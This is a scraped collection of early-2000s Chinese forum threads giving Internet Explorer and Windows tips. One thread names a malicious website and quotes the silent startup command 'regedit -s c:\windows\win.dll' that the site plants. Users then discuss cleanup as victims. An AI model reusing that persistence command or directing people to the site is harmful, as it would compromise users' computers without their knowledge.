hedgehog 终级用户 积分：862 发帖：381 来自： 注册：2000-08-24 | 发表于 2001-12-17 14:11:22 按此观看hedgehog的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给hedgehog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hedgehog的IP 碰到网上比较好的资料就想打印出来。可在浏览器中点击“打印”后，打出来的带有页面标题，页码，打印时间，等附加的东西，这些我如果不想在打印的时候出现，该怎么做？打印机属性里面好像找不到这些设置？ 如果是在ACDSEE里面打印图象的话，可以设置不出现文件名，至于Html格式的资料我就不知道该怎么设置了。 麻烦高手指点！ 什么是爱情？给我一次体验的机会...
POPOEVER N个蓝色大泡泡 版主 积分：22057 发帖：6043 来自：Keyframe 注册：2000-07-17 | 发表于 2001-12-17 16:10:47 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP IE-->"文件"菜单-->页面设置-->页眉、页脚里的东东都删掉 XTree 无可救药地活着，睡眼朦胧地醒着 世界杯决赛那天我过30岁生日，不冲突吧... Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
hedgehog 终级用户 积分：862 发帖：381 来自： 注册：2000-08-24 | 发表于 2001-12-17 16:31:29 按此观看hedgehog的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给hedgehog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hedgehog的IP 谢谢！ 什么是爱情？给我一次体验的机会...
上一贴 | 下一贴
快速回复 主题：如何去除打印html页面时的标题，页码和时间？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


win2000的IE历史文件列表都放在哪里？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
win2000的IE历史文件列表都放在哪里？

上一贴 | 下一贴
发表人 | 主题: win2000的IE历史文件列表都放在哪里？
cheng 初级用户 积分：46 发帖：16 来自：辽宁锦州 注册：2001-12-20 | 发表于 2001-12-29 15:18:42 按此观看cheng的个人资料 该用户不允许显示它的电子邮件 cheng 的 oicq 是3181247,查看 3181247 的资料 收藏该主题供以后查看 发送悄悄话给cheng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cheng的IP win2000的IE历史文件列表都放在哪里？ cola
POPOEVER N个蓝色大泡泡 版主 积分：22057 发帖：6043 来自：Keyframe 注册：2000-07-17 | 发表于 2001-12-29 15:48:09 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files XTree 无可救药地活着，睡眼朦胧地醒着 世界杯决赛那天我过30岁生日，不冲突吧... Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
51windows 海娃 积分：4495 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2001-12-30 01:25:55 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 历史文件列表 D:系统盘\Documents and Settings\haiwa（用户名）\Local Settings Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
上一贴 | 下一贴
快速回复 主题：win2000的IE历史文件列表都放在哪里？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


浏览器窗口的问题 - 经 典 论 坛

计算机技术
浏览器窗口的问题

上一贴 | 下一贴
发表人 | 主题: 浏览器窗口的问题
handmade 手工感情 现任版主 积分：3059 发帖：1734 来自：武汉 注册：2000-06-30 | 发表于 2002-01-02 13:58:20 按此观看handmade的个人资料 按此发邮件给handmade handmade 的 oicq 是797286,查看 797286 的资料 收藏该主题供以后查看 发送悄悄话给handmade 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看handmade的IP 现在用shift+点击连接弹出的新窗口一律最小化在右下角，一定要点击最大化才能全屏，试着将窗口拖到一定大小后按shift+关闭之后还是不行，有没有解决办法呵？ 你看见我的时候，我在你上空飞翔 Blueidea Web Team. Moderator Of Flash forum
大哥 超级用户 积分：322 发帖：112 来自： 注册：2001-12-20 | 发表于 2002-01-03 13:18:15 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 这个问题一般是由于网页中的某个JS脚本设置了浏览器的大小后，浏览器记录了此大小造成的。可以通过修改注册表解决： HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement 把这个键名删掉可以恢复默认设置。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 主题：浏览器窗口的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


win2000下载问题 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
win2000下载问题

上一贴 | 下一贴
发表人 主题: win2000下载问题
DW5

阻击之眼
积分：3356
发帖：3063
来自：blueidea
注册：2001-07-29
 发表于 2002-01-02 10:39:22 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 收藏该主题供以后查看 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
不知道为什么点击下载mp3时弹出的窗口是Windows Media Player，好像是试听似的，怎样解决？？

修身，养性，治国，平天下
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-02 10:58:15 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
文件关联问题
改一下就行
happywalker

高级用户
积分：259
发帖：144
来自：福建省－福州市
注册：2001-02-03
 发表于 2002-01-02 11:51:51 按此观看happywalker的个人资料 按此发邮件给happywalker 访问happywalker的主页 happywalker 的 oicq 是18571576,查看 18571576 的资料 发送悄悄话给happywalker 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看happywalker的IP
没错，我也碰到过类似的问题，点右键，然后选择下载的软件（比如你有NetAnts或者DAP之类)

**********************************

我自横刀向天笑，去留肝胆两昆仑

**********************************

DW5

阻击之眼
积分：3356
发帖：3063
来自：blueidea
注册：2001-07-29
 发表于 2002-01-02 19:36:06 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
Bee007在上个帖子中说
引用:
文件关联问题
改一下就行

怎样改？

修身，养性，治国，平天下
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 20:05:12 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
可以右键链接，选择save as来下载

态度决定一切

Blueidea Web Team
Team Member

凌志

终级用户
积分：544
发帖：166
来自：鞍山
注册：2001-01-09
 发表于 2002-01-03 15:35:08 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
右击链接，目标另存为。

网络天下
四海一家
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-03 17:01:33 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
资源管理器里头
工具|文件夹选项|文件类型
然后看着办吧。
上一贴 | 下一贴
快速回复 主题：win2000下载问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


我怎么无法打开*.chm的文件了? - 经 典 论 坛

计算机技术
我怎么无法打开*.chm的文件了?

上一贴 | 下一贴
发表人 | 主题: 我怎么无法打开*.chm的文件了?
冷语 Fierce 现任版主 积分：14069 发帖：5375 来自：BeiJing 注册：2001-03-06 | 发表于 2002-01-07 10:05:05 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 收藏该主题供以后查看 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP 双击啥反映也没有 [ Come As You Are ] Blueidea Web Team Moderator Of Flash forum
不知道 终级用户 积分：682 发帖：201 来自： 注册：2001-08-17 | 发表于 2002-01-07 10:20:10 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP 是你的文件有问题吧？ 知之为知之，不知为不知！！
冷语 Fierce 现任版主 积分：14069 发帖：5375 来自：BeiJing 注册：2001-03-06 | 发表于 2002-01-07 11:00:17 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP 重装了一次ie就好了 [ Come As You Are ] Blueidea Web Team Moderator Of Flash forum
上一贴 | 下一贴
快速回复 主题：我怎么无法打开*.chm的文件了?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


XP下的IE不支持JAVA，除了下载有其他办法吗？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
XP下的IE不支持JAVA，除了下载有其他办法吗？

上一贴 | 下一贴
发表人 | 主题: XP下的IE不支持JAVA，除了下载有其他办法吗？
chikin 初级用户 积分：71 发帖：19 来自：GuangZhou 注册：2001-12-27 | 发表于 2002-02-18 21:23:56 按此观看chikin的个人资料 按此发邮件给chikin 访问chikin的主页 chikin 的 oicq 是3636091,查看 3636091 的资料 收藏该主题供以后查看 发送悄悄话给chikin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看chikin的IP 我发现XP的IE是不支持JAVA APPLET的，INTERNET选项里也没了JAVA的项，一碰上的时候就会叫你下载JAVA虚拟机，但你知道拨号的速度真的太。。。而我自己又有IE6的安装碟，但就是不知怎样可以装入，谁来指点一下。 JavaScript Stack ----> 『网页天使』
BIGBUG 终级用户 积分：1278 发帖：803 来自：不一定 注册：2001-03-21 | 发表于 2002-02-19 11:44:34 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP XP底下只有在线升级最简单， IE6本身就没有虚拟机，有碟也不行，拨号也不用太长时间的 如果别的系统从IE6以下版本升级至IE6后不用下载 等我想想再签
上一贴 | 下一贴
快速回复 主题：XP下的IE不支持JAVA，除了下载有其他办法吗？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


一个很怪的问题 - 经 典 论 坛

计算机技术
一个很怪的问题

上一贴 | 下一贴
发表人 | 主题: 一个很怪的问题
cvbfight 高级用户 积分：256 发帖：66 来自： 注册：2002-02-09 | 发表于 2002-02-14 13:31:05 按此观看cvbfight的个人资料 按此发邮件给cvbfight 收藏该主题供以后查看 发送悄悄话给cvbfight 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cvbfight的IP 有这样一个网站：http://seekmm.6to23.com，先别打开。现象是只要浏览了该网站，则windows目录下就会出现一个叫win.dll的2k的文件，其实内容是注册表的，同时msconfig中也被加上一句regedit -s c:\windows\win.dll。奇怪的是即使我已经删掉了windows下的win.dll，并且在安全选面中禁止文件下载，但打开该网站后wn.dll和启动组又回来了！并且浏览时没有任何提示，这是怎么回事？ 不懂什么，就喜欢插嘴。
kirsten9 终级用户 积分：532 发帖：174 来自：冷冷的山脊 注册：2001-07-13 | 发表于 2002-02-14 13:59:04 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP 又是恶意代码，呵呵，升级你系统的java虚拟机 { KUka ALl wAYs wITh yOU }
话草 终级用户 积分：688 发帖：223 来自： 注册：2001-08-07 | 发表于 2002-02-14 19:36:47 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP scanreg/restore
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-14 20:38:26 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 去下载”超级兔子“也可以啊，还有就是不要再浏览那个网站拉 ::古落根门:: 唯有不断学习 才能不断进步
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-14 21:15:48 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 这些站点很讨厌的！！ 本来自己作的网页就不怎么样，还偏要加些乱七八糟的东西，靠………… 真TMD烂！！！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-15 01:03:09 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 你也去受害拉？深表同情 ::古落根门:: 唯有不断学习 才能不断进步
cvbfight 高级用户 积分：256 发帖：66 来自： 注册：2002-02-09 | 发表于 2002-02-15 17:22:18 按此观看cvbfight的个人资料 按此发邮件给cvbfight 发送悄悄话给cvbfight 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cvbfight的IP 我关心的是他是怎么做到的啊,网吧这么多机器,我在管理软件里加上网址过滤别人不就不能上了吗? 不懂什么，就喜欢插嘴。
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-15 17:31:25 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 我也是帮我哥们管网吧的， 经常遇到这种问题的，没有办法，只能一项一项的，慢慢的删啊！！！ 经常要改注册表呀，启动文件呀，系统文件呀，等等。 靠，烦死了，那些上网的家伙也是的，象这种屎网站也值得一上再上！！！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
bluecharm 初级用户 积分：52 发帖：14 来自：中国江苏省连云港 注册：2001-08-15 | 发表于 2002-02-17 22:39:48 按此观看bluecharm的个人资料 按此发邮件给bluecharm bluecharm 的 oicq 是17919570,查看 17919570 的资料 发送悄悄话给bluecharm 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluecharm的IP 其实可以解决的,可以在你的计划任务里,用记事本打开编辑一个注册表文件,在每次开机的时候,把注册表重新修改,可以解决很多的困难,其实很简单! 兰色的我,寻找的那片海洋的不一样的的蓝
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-17 22:42:27 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 哇！ 好办法，我怎么就没有想到呢！ 谢谢！ 我明天就去做一个！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-17 23:07:52 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 用批处理文件也可以 ::古落根门:: 唯有不断学习 才能不断进步
啸 无意 现任版主 积分：6225 发帖：2154 来自： 注册：2000-08-01 | 发表于 2002-02-17 23:19:32 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 你试在硬盘上搜索一下win.dll，估计不止一个。以前好象看过类似的问题，但一时想不起在哪了。 宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒...... Blueidea Web Team. Moderator Of Computer Technology Forum
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-18 10:28:21 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 不，现在的恶意网页有很多的方法让你登录的！ 比如说，有的会在C盘的WINDOWS文件夹里加入一个叫INTERNET.XXX的文件， 图标好象是IE的样子， 当你每次开机的时候就会自动运行！ 还有很多奇怪的方法！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
上一贴 | 下一贴
快速回复 主题：一个很怪的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


关于IE的问题？请各位高手指教 - 经 典 论 坛

计算机技术
关于IE的问题？请各位高手指教

上一贴 | 下一贴
发表人 | 主题: 关于IE的问题？请各位高手指教
musicsong 初级用户 积分：10 发帖：3 来自： 注册：2002-02-07 | 发表于 2002-02-18 23:01:49 按此观看musicsong的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给musicsong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看musicsong的IP 1。如何卸载IE？ 2。经常弹出IE非法操作的对话框是怎么回事？如何解决？ 3。覆盖安装一遍IE行不行？ 请各位高手指教。谢谢！ 你以为躲起来就找不到你了吗？没有用的！象你这样出色的男人，无论在什么地方，都像漆黑中的萤火虫一样，那样的鲜明，那样的出众。你那忧郁的眼神，稀嘘的胡喳子，神乎其神的刀法，和那杯Dry Martine，都深深地迷住了我。
seaice 超级用户 积分：450 发帖：119 来自： 注册：2002-02-09 | 发表于 2002-02-18 23:36:15 按此观看seaice的个人资料 按此发邮件给seaice seaice 的 oicq 是6439755,查看 6439755 的资料 发送悄悄话给seaice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看seaice的IP IE的删除需要特殊的工具去华军找就可以的 总是非法操作是系统的问题，先杀毒，磁盘扫描，最后是磁盘整理，还是不可以的话就重新安装了，不过要先把你的旧的删除了·
话草 终级用户 积分：688 发帖：223 来自： 注册：2001-08-07 | 发表于 2002-02-19 10:10:12 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP 解决非法操作 常用 ： 进入dos ， scanreg/restore
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-19 13:12:22 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 注册表保存最后5次备份，每天都会覆盖 scanreg/restore用迟了也不行啊:) ::古落根门:: 唯有不断学习 才能不断进步
上一贴 | 下一贴
快速回复 主题：关于IE的问题？请各位高手指教
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


关于收藏夹 - 经 典 论 坛

计算机技术
关于收藏夹

上一贴 | 下一贴
发表人 | 主题: 关于收藏夹
添君E画 危险人物 积分：1347 发帖：582 来自：四川省达洲市 注册：2002-01-11 | 发表于 2002-02-26 20:32:44 按此观看添君E画的个人资料 按此发邮件给添君E画 访问添君E画的主页 添君E画 的 oicq 是8341595,查看 8341595 的资料 收藏该主题供以后查看 发送悄悄话给添君E画 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看添君E画的IP 请问各位大哥 如何导入导出收藏夹 快回我有急用 [注：这是个危险人物！] .: :.
51windows 海娃 积分：4495 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-02-26 20:41:58 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 在/文件/菜单中有呀 选择整个文件夹 然后选择导出的位置 Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
添君E画 危险人物 积分：1347 发帖：582 来自：四川省达洲市 注册：2002-01-11 | 发表于 2002-02-26 21:10:37 按此观看添君E画的个人资料 按此发邮件给添君E画 访问添君E画的主页 添君E画 的 oicq 是8341595,查看 8341595 的资料 发送悄悄话给添君E画 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看添君E画的IP 谢海娃大哥了我这就看看去：） [注：这是个危险人物！] .: :.
添君E画 危险人物 积分：1347 发帖：582 来自：四川省达洲市 注册：2002-01-11 | 发表于 2002-02-26 21:13:45 按此观看添君E画的个人资料 按此发邮件给添君E画 访问添君E画的主页 添君E画 的 oicq 是8341595,查看 8341595 的资料 发送悄悄话给添君E画 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看添君E画的IP 不行啦我找不到在哪里呀：） 说明白点嘛最好是贴图 [注：这是个危险人物！] .: :.
浸食·花葬 极度色郎 积分：7812 发帖：2959 来自：|翅膀| 注册：2001-07-09 | 发表于 2002-02-26 22:19:40 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP IE - 文件 - 导入和导出 - 下一步 - 导出收藏夹 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
上一贴 | 下一贴
快速回复 主题：关于收藏夹
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


我记得说是从IE5开是，一个操作系统里可以装多个版本的浏览器 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
我记得说是从IE5开是，一个操作系统里可以装多个版本的浏览器

上一贴 | 下一贴
发表人 主题: 我记得说是从IE5开是，一个操作系统里可以装多个版本的浏览器
未注册

无头版主
现任版主
积分：3336
发帖：940
来自：穷山恶水
注册：2000-06-17
 发表于 2002-03-02 14:49:11 按此观看未注册的个人资料 按此发邮件给未注册 访问未注册的主页 收藏该主题供以后查看 发送悄悄话给未注册 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看未注册的IP
我记得说是从IE5开是，一个操作系统里可以装多个版本的浏览器。
这个是不是真的呢？
如果是真的话，具体该怎么操作呢？
装完两个不同版本浏览器互相之间有没有影响？
大家有没有人现在就是两个不同版本的IE浏览器，给我介绍一点相关的知识。

该用户未注册，没有签名。

Blueidea Web Team.
Moderator Of Fireworks Forum.

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-03-02 16:40:59 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
有这个可能么，我觉得好像不可行，因为当你安装Ie的时候，他完全是更新安装的，也就是直接覆盖，只会在升级的时候提是你是否需要备份原来的文件，到时候可以恢复，没有看到可以安装其他版本的！
还有，我觉得不可能的就是，如果是两个浏览器的话，那么它们之间肯定要有冲突，他们所能够支持的技术不同吧！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-03-02 18:13:45 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
你是说装IE和藤讯的双浏览器吗？
还是装两个IE呢？？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

未注册

无头版主
现任版主
积分：3336
发帖：940
来自：穷山恶水
